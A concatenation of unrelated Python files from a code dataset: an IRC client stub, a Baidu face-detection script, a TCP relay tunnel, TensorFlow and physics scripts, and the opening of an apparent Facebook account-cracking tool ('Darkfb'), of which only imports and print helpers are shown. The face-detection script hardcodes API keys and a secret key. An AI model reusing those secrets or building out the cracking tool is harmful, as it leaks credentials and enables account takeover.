90915e0a41438c2373e73cc3ba2e72afdaca1b45 | 1ee6f343c9e7173b89993e3acca185f45a6ffda7 | /client_side/main.py | a69c15b1bca5a629f2b1c324619717dc4400dfdc | ["MIT"] | permissive | gmillia/IRC | 351a8352112a65fde76ab89addc2d18658f13af4 | 4c7f099ada266830d47c558c37078b107789c48d | refs/heads/master | 2022-09-18T21:54:30.494942 | 2020-06-01T01:46:43 | 2020-06-01T01:46:43 | 265,183,836 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 109 | py |
from client import Client

if __name__ == "__main__":
    client_instance = Client()
    client_instance.menu()
["[email protected]"] | |
f7a133da42b483bbd6721ea185ae86310461ffcc | 1eb2d7d2a6e945a9bc487afcbc51daefd9af02e6 | /algorithm/zhang/baiduface.py | aae543c80ba05cfedc089fe690d2f4beb4954ca2 | [] | no_license | fengges/eds | 11dc0fdc7a17b611af1f61894f497ad443439bfe | 635bcf015e3ec12e96949632c546d29fc99aee31 | refs/heads/master | 2021-06-20T04:43:02.019309 | 2019-06-20T12:55:26 | 2019-06-20T12:55:26 | 133,342,023 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,255 | py |
import os, time
from aip import AipFace
from PIL import Image, ImageDraw

""" Your APPID / API key / secret key """
APP_ID = '10909628'
API_KEY = 'sInxLcVbCLSg6rNXVDXR4sHD'
SECRET_KEY = 'e2zgNstc7GEhhvFOfCVKDW2itVf0iID4'
filepath = "pic"

client = AipFace(APP_ID, API_KEY, SECRET_KEY)

def get_file_content(filePath):
    with open(filePath, 'rb') as fp:
        return fp.read()

pathDir = os.listdir(filepath)
for path in pathDir:
    pic = filepath + '/' + path
    pic3 = "pic3/" + path
    image = get_file_content(pic)
    """ Call face detection """
    client.detect(image)
    """ Optional parameters """
    options = {}
    options["max_face_num"] = 10
    options["face_fields"] = "age"
    """ Call face detection with parameters """
    res = client.detect(image, options)
    try:
        result = res["result"]
    except:
        print(res)
    img = Image.open(pic3)
    img_d = ImageDraw.Draw(img)
    for f in result:
        face_rectangle = f["location"]
        img_d.rectangle((face_rectangle['left'], face_rectangle['top'],
                         face_rectangle['left'] + face_rectangle['width'],
                         face_rectangle['top'] + face_rectangle['height']), outline="red")
    img.save(pic3)
    img.close()
    print("sleep")
    time.sleep(2)
["[email protected]"] | |
e8773eb18e0bca70b0803491328944b2739f03b1 | 02882742ef02d83d52f48354b44d600df3b7aa47 | /TCPTunnelClient.py | 20a0b790fdf47743b956eb0a8d1efeebcc0e9dbc | [] | no_license | BIDGroup/TCPTunnel | c02c1c46304fe8156815f9a8e4408875de57d533 | a6b271b13f46156c82283106b3f69b23de4f7f89 | refs/heads/master | 2020-03-31T03:28:54.249992 | 2018-10-05T09:39:18 | 2018-10-05T09:39:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,154 | py |
import socket
import sys
import time
import threading

def heartCheck(s):
    print "Heart Pack Thread Start"
    while True:
        try:
            data = s.recv(128)
            if not data:
                print "Heart Pack Tunnel Break"
                break
        except Exception:
            print "Heart Pack Tunnel Break"
            break

def link(s1, s2):
    while True:
        try:
            data = s1.recv(10240)
            if not data:
                s1.close()
                s2.close()
                break
            s2.send(data)
        except Exception:
            s1.close()
            s2.close()
            break

print "### TCPTunnelClient ###"
print "Please Enter Local Server Port:"
localPort = int(raw_input())
localAddress = ('0.0.0.0', localPort)
print "Please Enter Re-Link Server Address:"
reLinkIP = raw_input()
print "Please Enter Re-Link Server Port:"
reLinkAddress = (reLinkIP, int(raw_input()))
print "Please Enter Remote Server Address:"
remoteIP = raw_input()
print "Please Enter Remote Server Port:"
remotePort = int(raw_input())
remoteAddress = (remoteIP, remotePort)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
s.bind(localAddress)
s.connect(remoteAddress)
s.send("Hello")
msg = s.recv(512)
print "Successful Link Remote Server!"
print "Get Link Address:", msg
s.close()

print "Start Local Server"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
s.bind(localAddress)
s.listen(localPort)

ss, addr = s.accept()
print "Heart Pack Tunnel Build"
t1 = threading.Thread(target=heartCheck, args=(ss,))
t1.setDaemon(True)
t1.start()

print "Start ReLink Service"
while True:
    client, addr = s.accept()
    print "Link From:", addr, "Start ReLink"
    reLinkClient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    reLinkClient.connect(reLinkAddress)
    t2 = threading.Thread(target=link, args=(reLinkClient, client))
    t2.setDaemon(True)
    t2.start()
    t3 = threading.Thread(target=link, args=(client, reLinkClient))
    t3.setDaemon(True)
    t3.start()
["[email protected]"] | |
718e3a5fc92037cb1b160a8aa5414d824609ab9d | c3082eb2adc43b311dd3c9ff16fd3ed9df85f266 | /python/examples/functional/filter.py | 9c0234468fbdee92b7c2a3dfc2206ea06281c324 | [] | no_license | szabgab/slides | 78818c7138331b3ba9e221c81da3678a46efe9b3 | 63bba06678554db737602f2fbcd6510c36037e8a | refs/heads/main | 2023-08-31T07:13:51.536711 | 2023-08-29T13:17:59 | 2023-08-29T13:17:59 | 122,212,527 | 87 | 69 | null | 2023-05-19T06:55:11 | 2018-02-20T14:57:03 | Python | UTF-8 | Python | false | false | 122 | py |
numbers = [1, 3, 27, 10, 38]
big_numbers = filter(lambda n: n > 10, numbers)
print(big_numbers)        # in Python 3, filter returns a lazy filter object
print(list(big_numbers))  # materializes the filtered values: [27, 38]
["[email protected]"] | |
30ca95084a650818ad76ed5e625a46506e6e8e39 | 60e27c8b1755c741dfd069393e8b65766a9647ae | /07_Natural_Language_Processing/C0702_bag_of_words.py | fb7af5b042f0820d93e1aaa9984960d0ba24a209 | ["MIT"] | permissive | xiejinwen113/tensorflow_cookbook | d0426991be2369d6480728c2af7a4dc93eccf621 | 57d7ee719385ddd249a67c3a85bd336e884a67e5 | refs/heads/master | 2022-03-24T08:30:43.089441 | 2019-12-09T09:55:39 | 2019-12-09T09:55:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,784 | py |
# -*- encoding: utf-8 -*-
"""
@Author    : zYx.Tom
@Contact   : [email protected]
@site      : https://github.com/zhuyuanxiang/tensorflow_cookbook
---------------------------
@Software  : PyCharm
@Project   : TensorFlow_Machine_Learning_Cookbook
@File      : C0702_bag_of_words.py
@Version   : v0.1
@Time      : 2019-11-07 17:11
@License   : (C)Copyright 2018-2019, zYx.Tom
@Reference : "TensorFlow Machine Learning Cookbook" by Nick McClure, Sec. 07.02, p. 144
@Desc      : Natural language processing: implementing a "bag of words" model with TensorFlow
@Notes:
1. This model is misconceived: 87% of the messages in the dataset are ham, so always predicting
   "ham" already yields 87% accuracy. The trained model stays below 87%, which shows how important
   it is to understand the dataset correctly.
2. Tracing sess.run(x_col_sums, feed_dict={x_data: t}) also shows that the trained embedding simply
   flags messages with many UNKNOWN tokens or many 'to' tokens as spam. This again comes from the
   skew in the dataset; the root cause is a mismatch between model and data.
"""
# common imports
import os
import string
import sys

import matplotlib.pyplot as plt
import numpy as np  # pip install "numpy<1.17"; versions below 1.17 do not raise the error
import sklearn
import tensorflow as tf
import winsound
from tensorflow.contrib import learn
from tensorflow.python.framework import ops

# Set the precision used when printing data
np.set_printoptions(precision=8, suppress=True, threshold=np.inf, linewidth=200)
# Fix the random seed so that random test results are reproducible across runs
seed = 42
np.random.seed(seed)
tf.set_random_seed(seed)
# Python ≥3.5 is required
assert sys.version_info >= (3, 5)
# Scikit-Learn ≥0.20 is required
assert sklearn.__version__ >= "0.20"
# numpy 1.16.4 is required
assert np.__version__ in ["1.16.5", "1.16.4"]
# Suppress the warning: Your CPU supports instructions that this TensorFlow binary was not compiled to use: AVX2 FMA
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
# Reset the default computation graph
ops.reset_default_graph()
# Open graph session
sess = tf.Session()

# ----------------------------------------------------------------------
print("载入数据。。。")
# Read the file directly if it is already downloaded; otherwise download it first
data_file_name = "../Data/SMS_SPam/SMSSpamCollection"
with open(data_file_name, encoding='utf-8') as temp_output_file:
    text_data = temp_output_file.read()
    pass
pass

# Format Data
text_data = text_data.encode('ascii', errors='ignore')
text_data = text_data.decode().split('\n')
text_data = [x.split('\t') for x in text_data if len(x) >= 1]
texts = [x[1] for x in text_data]
target = [x[0] for x in text_data]
# Turn the labels into integers: 'spam' (junk message) -> 1, 'ham' (normal message) -> 0
target = [1 if x == 'spam' else 0 for x in target]
# Normalize the text
texts = [x.lower() for x in texts]  # lowercase all letters
texts = [''.join(c for c in x if c not in string.punctuation) for x in texts]  # remove punctuation
texts = [''.join(c for c in x if c not in '0123456789') for x in texts]  # remove digits
texts = [' '.join(x.split()) for x in texts]  # remove extra whitespace

# Count words of different lengths in the text; cap the word count per message at 50
text_lengths = [len(x.split()) for x in texts]
text_lengths = [x for x in text_lengths if x < 50]
plt.hist(text_lengths, bins=25)
plt.title("图7-1:文本数据中的单词长度的直方图")

sentence_size = 25  # at most 25 words per sentence; shorter sentences are zero-padded, longer ones truncated from the end
min_word_freq = 3  # a word must occur at least 3 times; words appearing in only a few messages are left out of the vocabulary
# TensorFlow's built-in tokenizer, VocabularyProcessor()
vocab_processor = learn.preprocessing.VocabularyProcessor(sentence_size, min_frequency=min_word_freq)
# Have to fit transform to get length of unique words.
vocab_processor.fit_transform(texts)  # fit on the text data and build the vocabulary
embedding_size = len(vocab_processor.vocabulary_)  # use the vocabulary size as the embedding size

# Split the text data into a training set (80%) and a test set (20%)
train_indices = np.random.choice(len(texts), int(round(len(texts) * 0.8)), replace=False)
test_indices = np.array(list(set(range(len(texts))) - set(train_indices)))
texts_train = [x for ix, x in enumerate(texts) if ix in train_indices]
texts_test = [x for ix, x in enumerate(texts) if ix in test_indices]
target_train = [x for ix, x in enumerate(target) if ix in train_indices]
target_test = [x for ix, x in enumerate(target) if ix in test_indices]

# Identity matrix used for one-hot encoding
identity_mat = tf.diag(tf.ones(shape=[embedding_size]))
# Variables for logistic regression
A = tf.Variable(tf.random_normal(shape=[embedding_size, 1]))
b = tf.Variable(tf.random_normal(shape=[1, 1]))
# Initialize placeholders
x_data = tf.placeholder(shape=[sentence_size], dtype=tf.int32)
y_target = tf.placeholder(shape=[1, 1], dtype=tf.float32)

# Look up the Text-Vocab embedding; the identity matrix maps each word of the sentence to its one-hot vector
x_embed = tf.nn.embedding_lookup(identity_mat, x_data)
x_col_sums = tf.reduce_sum(x_embed, 0)  # ToDo: why sum over the columns?

# Model output
x_col_sums_2D = tf.expand_dims(x_col_sums, 0)
model_output = x_col_sums_2D @ A + b
# Cross-entropy loss
loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels=y_target, logits=model_output))
# Prediction operation
prediction = tf.sigmoid(model_output)
# Declare optimizer
my_opt = tf.train.GradientDescentOptimizer(0.001)
train_step = my_opt.minimize(loss)

# Intitialize Variables
init = tf.global_variables_initializer()
sess.run(init)

# Start Logistic Regression
print('基于训练集中{}个句子开始训练。。。'.format(len(texts_train)))
loss_vec, train_acc_all, train_acc_avg = [], [], []
for ix, t in enumerate(vocab_processor.transform(texts_train)):  # transform only, no fitting: the vocabulary must not be retrained
    y_data = [[target_train[ix]]]
    sess.run(train_step, feed_dict={x_data: t, y_target: y_data})
    temp_loss = sess.run(loss, feed_dict={x_data: t, y_target: y_data})
    loss_vec.append(temp_loss)
    if ix % 100 == 0:
        print('训练集迭代次数: #' + str(ix + 1) + ': Loss = ' + str(temp_loss))
        pass
    [[temp_pred]] = sess.run(prediction, feed_dict={x_data: t, y_target: y_data})
    # Collect the prediction result
    train_acc_temp = target_train[ix] == np.round(temp_pred)
    train_acc_all.append(train_acc_temp)
    if len(train_acc_all) >= 50:
        # Track the average accuracy over the last 50 training samples
        train_acc_avg.append(np.mean(train_acc_all[-50:]))
        pass
    pass

# Evaluate accuracy on the test set
print('基于测试集中{}个句子开始评估。。。'.format(len(texts_test)))
test_acc_all = []
for ix, t in enumerate(vocab_processor.transform(texts_test)):
    y_data = [[target_test[ix]]]
    if ix % 50 == 0:
        print("测试集迭代次数 #", ix + 1)
        pass
    [[temp_pred]] = sess.run(prediction, feed_dict={x_data: t, y_target: y_data})
    test_acc_temp = target_test[ix] == np.round(temp_pred)
    test_acc_all.append(test_acc_temp)
    pass
print("\n测试集精度: {}".format(np.mean(test_acc_all)))

# Plot training accuracy over time
plt.figure()
plt.plot(range(len(train_acc_avg)), train_acc_avg, 'b-', label="训练集精度")
plt.title("统计最后50个训练集数据的平均训练集精度")
plt.xlabel('迭代次数')
plt.ylabel("训练集精度")

# -----------------------------------------------------------------
# Beep when the run finishes
winsound.Beep(600, 500)
if len(plt.get_fignums()) != 0:
    plt.show()
    pass
["[email protected]"] | |
7168dd9db8e3031656351de42448d8638bdc049a | 765ac605a9db834f311cc7cf60553b66d42184fb | /lecture_03/task_03/task_03.py | a76e4aebf838ec9ba1105492e9113080fe129eee | [] | no_license | vasil-dimov/python_softuni_homeworks | 3946ab13a0b69661f745e1290fa5bd45bdc7c264 | 1efac3679a3c6459c5cb3f597116fcdab8ca2716 | refs/heads/master | 2021-06-13T04:25:15.120352 | 2017-03-27T19:01:15 | 2017-03-27T19:01:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 644 | py |
FILE_PATH = './../assets/catalog_sample.csv'  # or catalog_full.csv
UPDATED_FILE_PATH = './../assets/updated_price_catalog_sample.csv'
PERCENT = 0.75  # 75%

with open(FILE_PATH, encoding='utf-8') as f:
    with open(UPDATED_FILE_PATH, 'w', encoding='utf-8') as f_updated:
        for line in f:
            line = line.strip()
            current_line_list = line.split(',')
            updated_price = float(current_line_list[-1]) + float(current_line_list[-1]) * PERCENT
            current_line_list[-1] = updated_price
            updated_line = ','.join(str(e) for e in current_line_list)
            f_updated.write(updated_line + '\n')
["[email protected]"] | |
2a1a2dba821ba88d97ccfa8b1ac0ad83ecc9db61 | 5a07828016e8bafbea5dac8f83c8bfd5d0bfd603 | /py_290w290/140309_srw.py | ba5c140fc766ac183dd4cc526b37aee626cb33e2 | [] | no_license | JJHopkins/rajter_compare | db5b88d2c6c1efc0fead9b6ed40fb3cce36bedb4 | 2ba52f4f16cf2aca350a82ea58d0aa8f8866c47c | refs/heads/master | 2020-06-04T23:53:57.089329 | 2014-04-08T18:02:30 | 2014-04-08T18:02:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,176 | py |
#$ {\bf Free energy between two skewed cylinders (CG-10 in water). Full retarded result, function of separation $\ell$ and angle $\theta$} \\
#$ Equation 12: $G(\ell,\theta) = - \frac{ (\pi R_1^{2})(\pi R_2^{2}) }{2 \pi~\ell^{4} \sin{\theta}} \left( {\cal A}^{(0)}(\ell) + {\cal A}^{(2)}(\ell) \cos 2\theta \right)$ \\
#$ $G(\ell,\theta) = - \frac{k_BT}{64 \pi} \frac{ \pi^2 R_1^{2} R_2^{2} }{\ell^{4} \sin{\theta}} {\sum_{n=0}^{\infty}}' \Delta_{1,\parallel} \Delta_{2,\parallel} ~p_n^{4} ~\int_0^{\infty} t dt ~\frac{e^{- 2 p_n \sqrt{t^{2} + 1}}}{(t^{2} + 1)} \tilde g(t, a_1(i \omega_n), a_2(i \omega_n), \theta),$ \\
#$ with $\tilde g(t, a_1, a_2, \theta) &=& 2 \left[ (1+3a_1)(1+3a_2) t^{4} + 2 (1+2a_1+2a_2+3a_1a_2) t^{2} + 2(1+a_1)(1+a_2)\right] + \nonumber \\
#$ & & ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + (1-a_1)(1-a_2)(t^{2} + 2)^2 \cos 2\theta.$ \\
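# Added annotation (inferred from the code below, not part of the original source):
# A^{(0)}(l) -> sum_A and A^{(2)}(l) -> sum_A_2, summed over the Matsubara index n with the
# n = 0 term halved (the primed sum); p_n = sqrt(eiz_w) * (coeff * n) * l / c, which is the
# factor inside np.exp() in ys() and y_2s(); the t-integral of g~ is evaluated numerically
# with trapz over ts, and G(l, theta) is assembled in G_l_t_dt.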
#!/usr/bin/python
import numpy as np
import scipy.optimize as opt
from scipy.integrate import trapz
import matplotlib.pyplot as pl
from matplotlib import axis as ax
# use pyreport -l file.py
from pylab import show
from matplotlib.ticker import MultipleLocator
from mpl_toolkits.mplot3d import Axes3D
from pylab import pause
from matplotlib.backends.backend_pdf import PdfPages
#pp = PdfPages('plots/skew_ret_water/skew_ret_water.pdf')
eiz_x = np.loadtxt('data/eiz_x_output_eV.txt') #perpendicular, radial
eiz_z = np.loadtxt('data/eiz_z_output_eV.txt') # parallel,axial
eiz_w = np.loadtxt('data/eiz_w_output_eV.txt') # water as intervening medium
#eiz_w[0] = eiz_w[1] #NOTE: there is a jump from first val down to second val
x90_A0, y90_A0 = np.loadtxt('data/290-W-290-PERPA0.PRN',unpack=True, usecols = [0,1]) # water as intervening medium
x90_A2, y90_A2 = np.loadtxt('data/290-W-290-PERPA2.PRN',unpack=True, usecols = [0,1]) # water as intervening medium
r_1 = 1.0e-9
r_2 = 1.0e-9
c = 2.99e8 # in m/s
Temp = 297
kb = 1.3807e-23 # in J/K
coeff = 2.411e14 # in rad/s
# NOTES:
# at RT, 1 kT = 4.11e-21 J
# 1 eV = 1.602e-19 J = 0.016 zJ
# h_bar_eV = 6.5821e-16 eVs
# h_bar = 1. #1.0546e-34 #in Js
#kb = 8.6173e-5 # in eV/K
# z_n_eV = (2*pi*kT/h_bar)n
# = (0.159 eV) / (6.5821e-16 eVs)
# = n*2.411e14 rad/s
# z_n_J = (2*pi*kT/h_bar)n
# = (1.3807e-23 J/K) / (1.0546e-34 Js))*n
# = n*2.411e14 rad/s
#coeff = 0.159 # in eV w/o 1/h_bar
ns = np.arange(0.,500.)
z = ns * coeff
ls = np.linspace(1.0e-9, 1.0e-6, 200)
#thetas = np.linspace((0.01)*np.pi,(1./2)*np.pi,25)
thetas = [np.pi/8,np.pi/4,np.pi/3,np.pi/2]
dt = 1.0
ts = np.arange(1.0,10000.,dt)
def Aiz(perp, par, med):
    return (2.0*(perp-med)*med)/((perp+med)*(par-med))

def ys(a, time, eizw, L, N):
    term0 = (time / (time*time + 1.0))
    term1 = (time**4 * 2.0*(1. + 3.*a)*(1. + 3.*a))
    term2 = (time**2 * 4.0*(1. + 2.0*a + 2.0*a + 3.0*a*a))
    term3 = (4.0*(1. + a)*(1.0 + a))
    term4 = (-2.0 * np.sqrt(eizw) * L * coeff * N / c * np.sqrt(time*time + 1.0))
    #print 'ys term0', term0
    #print 'ys term1', term1
    #print 'ys term2', term2
    #print 'ys term3', term3
    #print 'ys term4', term4
    #print '----'
    return (term0) * np.exp(term4)*((term1) + (term2) + (term3))  # * term5

def y_2s(a, time, eizw, L, N):
    term0 = (time / (time*time + 1.0))
    term1 = ((1. - a)*(1. - a)*(time*time + 2.0)*(time*time + 2.0))
    term2 = (-2.0 * np.sqrt(eizw) * L * coeff * N / c * np.sqrt(time*time + 1.0))
    #print 'y_2s term0', term0
    #print 'y_2s term1', term1
    #print 'y_2s term2', term2
    #print '----'
    return term0 * term1 * np.exp(term2)  # * term3

def As(eizz, eizw, L, N, Y):
    term1 = (((eizz-eizw)/eizw)*((eizz-eizw)/eizw))
    term2 = (Y * eizw * eizw * (coeff*N)**4 * L**4 / (c**4))
    #term3 = Y
    #print 'As term1 = ', term1
    #print 'As term2 = ', term2
    ##print 'As term3 = ', term3
    #print '----'
    return term1 * term2  # * term3

def A_2s(eizz, eizw, L, N, Y):
    term1 = (((eizz-eizw)/eizw)*((eizz-eizw)/eizw))
    term2 = (Y * eizw * eizw * (coeff*N)**4 * L**4 / (c**4))
    #term3 = Y
    #print 'A_2s term1 = ', term1
    #print 'A_2s term2 = ', term2
    ##print 'A_2s term3 = ', term3
    #print '----'
    return (term1 * term2)  # * term3
y = np.zeros(shape=(len(ns),len(ls)))
y_2 = np.zeros(shape=(len(ns),len(ls)))
A = np.zeros(shape=(len(ns),len(ls)))
A_2 = np.zeros(shape=(len(ns),len(ls)))
EL = np.zeros(len(ls))
G_l_t_dt = np.zeros(shape=(len(ls),len(thetas)))
A2_theta = np.zeros(shape=(len(ls),len(thetas)))
aiz = []
aiz = Aiz(eiz_x,eiz_z, eiz_w) # of length = len(ns)
#aiz[74] = aiz[73]
#aiz[75] = aiz[76]
for k, length in enumerate(ls):
    sum_A = np.empty(len(ls))
    sum_A_2 = np.empty(len(ls))
    for j, n in enumerate(ns):
        # Integral:
        y[j, k] = trapz(ys(aiz[j], ts, eiz_w[j], length, n), ts, dt)
        y_2[j, k] = trapz(y_2s(aiz[j], ts, eiz_w[j], length, n), ts, dt)
        #print 'dt Integral y = ', i, k, j, y
        #print 'dt Integral y_2 = ', i, k, j, y_2
        #print '----'
        #print 'N terms for A0 = ', As(eiz_z[j], eiz_w[j], length, n, y)
        #print 'N terms for A2 = ', A_2s(eiz_z[j], eiz_w[j], length, n, y_2)
        #print '----'
        A[j, k] = As(eiz_z[j], eiz_w[j], length, n, y[j, k])
        A_2[j, k] = A_2s(eiz_z[j], eiz_w[j], length, n, y_2[j, k])  # * np.cos(2.0*theta)
    A[0] = (1./2)*A[0]
    A_2[0] = (1./2)*A_2[0]
    sum_A = np.sum(A, axis=0)
    #print 'sum of A0 = ', k, j, sum_A
    sum_A_2 = np.sum(A_2, axis=0)
    #print 'sum of A2 = ', k, j, sum_A_2
    #print '----'
    #print 'shape sum_A_2 = ', np.shape(sum_A_2)
    #sys.exit()

for k, length in enumerate(ls):
    for i, theta in enumerate(thetas):
        EL[k] = 1./(length*length*length*length)
        A2_theta[k, i] = sum_A_2[k] * np.cos(2.0*theta)
        G_l_t_dt[k, i] = (1.602e-19 / 4.11e-21) * (1./32) * EL[k]*np.pi*r_1*r_1*r_2*r_2*(sum_A[k] + sum_A_2[k]*np.cos(2.0*theta))/(2.0*np.sin(theta))  # (1e21)*
np.savetxt('G_srw.txt',G_l_t_dt)
#pl.figure()
#pl.plot(ns,eiz_x, color = 'b', label = r'$\varepsilon_{\hat{x}}(i\zeta_{N})$')
#pl.plot(ns,eiz_z, color = 'r', label = r'$\varepsilon_{\hat{z}}(i\zeta_{N})$')
##pl.plot(ns,eiz_w, color = 'c', label = r'$\varepsilon_{vac}(i\zeta_{N})$')
#pl.plot(ns,eiz_w, color = 'c', label = r'$\varepsilon_{water}(i\zeta_{N})$')
#pl.xlabel(r'$N$', size = 20)
#pl.ylabel(r'$\varepsilon(i\zeta)$', size = 20)
#pl.legend(loc = 'best')
##pl.title(r'$\mathrm{CG-10\, DNA}$', size = 20)
##pl.axis([0,500,0.9,2.6])
##pl.savefig('plots/skew_ret_water/eiz.pdf' )
#show()
pl.figure()
pl.plot(ns,aiz, color = 'b')#, label = r'$\varepsilon_{\hat{x}}(i\zeta_{N})$')
pl.xlabel(r'$N$', size = 20)
pl.ylabel(r'$a_{1,2}(i\zeta_{N})$', size = 20)
pl.legend(loc = 'best')
#pl.title(r'$\mathrm{Anisotropy \,Metric}$', size = 20)
#pl.axis([0,500,0.9,2.6])
pl.grid()
pl.savefig('plots/skew_ret_water/140306_290w290_aiz.pdf' )
show()
pl.figure()
pl.loglog(1e9*ls,(1e21*kb*Temp/32)*sum_A ,'b-', label = r'$\mathcal{A^{(0)}}(\ell)$')
pl.loglog(1e9*ls,(1e21*kb*Temp/32)*sum_A_2,'g-', label = r'$\mathcal{A^{(2)}}(\ell)$')
pl.loglog(x90_A0, y90_A0,'k-' , label = r'GH $\mathcal{A^{(0)}}(\ell)$')
pl.loglog(x90_A2, y90_A2,'k--', label = r'GH $\mathcal{A^{(2)}}(\ell)$')
pl.xlabel(r'$\mathrm{separation}\,\ell\,\,\,\rm{[nm]}$', size = 20)
pl.ylabel(r'$\mathrm{\mathcal{A^{(0)},\,\,A^{(2)}}}\,\,\,\rm{[zJ]}$', size = 20)
#pl.title(r'$\mathrm{Hamaker \, coeff.s \,:\,skewed,\,retarded,\,water}$', size = 20)
#pl.legend(loc = 'best')
#pl.axis([1e-9,1e-6,1e-24,1e-19])
pl.minorticks_on()
pl.ticklabel_format(axis = 'both')
pl.grid(which = 'both')
pl.tick_params(which = 'both',labelright = True)
pl.savefig('plots/skew_ret_water/140309_290w290_GH_skew_ret_A0_A2.pdf')
show()
pl.figure()
pl.loglog(ls,(kb*Temp/32)*sum_A,'b-', label = r'$\mathcal{A^{(0)}}(\ell)$')
pl.loglog(ls,(kb*Temp/32)*sum_A_2,'g-', label = r'$\mathcal{A^{(2)}}(\ell)$')
#pl.loglog(ls,(kb*T/32)*A2_theta,':', label = r'$\mathcal{A^{(2)}}(\ell)cos(2\theta)$')
pl.xlabel(r'$\mathrm{separation}\,\ell\,\,\,\rm{[m]}$', size = 20)
pl.ylabel(r'$\mathrm{\mathcal{A^{(0)},\,\,A^{(2)}}}$', size = 20)
#pl.title(r'$\mathrm{Hamaker \, coeff.s \,:\,skewed,\,retarded,\,water}$', size = 20)
pl.legend(loc = 'upper right')
#pl.axis([1e-9,1e-6,1e-24,1e-19])
pl.minorticks_on()
pl.ticklabel_format(axis = 'both')
pl.grid(which = 'both')
pl.tick_params(which = 'both',labelright = True)
pl.savefig('plots/skew_ret_water/140306_290w290_skew_ret_A0_A2.pdf')
show()
ls4 = 1e9*ls[ 2]#2]
ls5 = 1e9*ls[12]#4]
ls6 = 1e9*ls[22]#6]
ls1 = 1e9*ls[32]#8]
ls2 = 1e9*ls[42]#12]
ls3 = 1e9*ls[52]#16]
fig = pl.figure()
ax = fig.add_axes([0.1,0.1,0.8,0.8])
#pl.semilogy(thetas, G_l_t_dt)
ax.semilogy(thetas, G_l_t_dt[ 2,:], label = r'$\ell$ = %1.2f nm' %ls4)
ax.semilogy(thetas, G_l_t_dt[12,:], label = r'$\ell$ = %1.2f nm' %ls5)
#ax.semilogy(thetas, G_l_t_dt[22,:], label = r'$\ell$ = %1.2f nm' %ls6)
ax.semilogy(thetas, G_l_t_dt[32,:], label = r'$\ell$ = %1.2f nm' %ls1)
#ax.semilogy(thetas, G_l_t_dt[42,:], label = r'$\ell$ = %1.2f nm' %ls2)
ax.semilogy(thetas, G_l_t_dt[52,:], label = r'$\ell$ = %1.2f nm' %ls3)
#ax.semilogy(0,0,'', label = r'$G_\theta = cos(2\theta)/2sin(\theta)$')
pl.xlabel(r'$Angle\,\,\mathrm{[radians]}$', size = 20)
pl.ylabel(r'$-G(\ell,\theta)\,\,\mathrm{[k_{B}T]}$', size = 20)
#pl.axis([0,1.7,1e-10,1.0])
#pl.title(r'$\mathrm{-G(\ell,\theta)\,vs.\,angle:\,skewed,\,retarded,\,water}$', size = 20)
pl.legend(loc = 'lower left')
#pl.savefig('plots/skew_ret_water/skew_ret_water_G_vs_theta.pdf')
#show()
pl.minorticks_on()
pl.ticklabel_format(axis = 'both')
pl.grid(which = 'both')
pl.tick_params(which = 'both',labelright = True)
pl.savefig('plots/skew_ret_water/140306_290w290_skew_ret_G_vs_theta_fixed_l.pdf')
show()
pl.figure()
#pl.loglog(ls, G_l_t_dt)#, label = labels[i])
pl.loglog(ls, G_l_t_dt[:,1], label = r'$\theta = \pi/4$')
pl.loglog(ls, G_l_t_dt[:,2], label = r'$\theta = \pi/3$')
pl.loglog(ls, G_l_t_dt[:,3], label = r'$\theta = \pi/2$')
pl.xlabel(r'$\ell\,\,\mathrm{[m]}$', size = 24)
pl.ylabel(r'$-G(\ell,\theta)\,\,\mathrm{[k_{B}T]}$', size = 20)
#pl.axis([1.0e-9, 1.0e-6,1e-16,1e3])
#pl.title(r'$\mathrm{-G(\ell,\theta)\,vs.\,separation:\,skewed,\,retarded,\,water}$', size = 20)
pl.legend(loc = 'best')
pl.minorticks_on()
pl.ticklabel_format(axis = 'both')
pl.grid(which = 'both')
pl.tick_params(which = 'both',labelright = True)
pl.savefig('plots/skew_ret_water/140306_290w290_skew_ret_G_vs_l.pdf')
show()
["[email protected]"] | |
3a3056a3ecc1b144f2938566879e80bcdd3c95c1 | 4561d27896157c67da3c97fb7bd99537b3ec1ac2 | /Darkfb.sh | 1be0b8432c647878d63caa02476ed42b381c143a | [] | no_license | bang-Habib/dark.fb | 2fb23d75c544a489b727fd859a137481f700a99a | 5c774aff111510193d51ce70a8aef50b09de8dab | refs/heads/main | 2023-02-10T14:32:41.114991 | 2021-01-13T12:38:13 | 2021-01-13T12:38:13 | 329,298,237 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 33,210 | sh |
#!/usr/bin/python2
# coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(x):
w = 'mhkbpcP'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(x):
w = 'mhkbpcP'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.05)
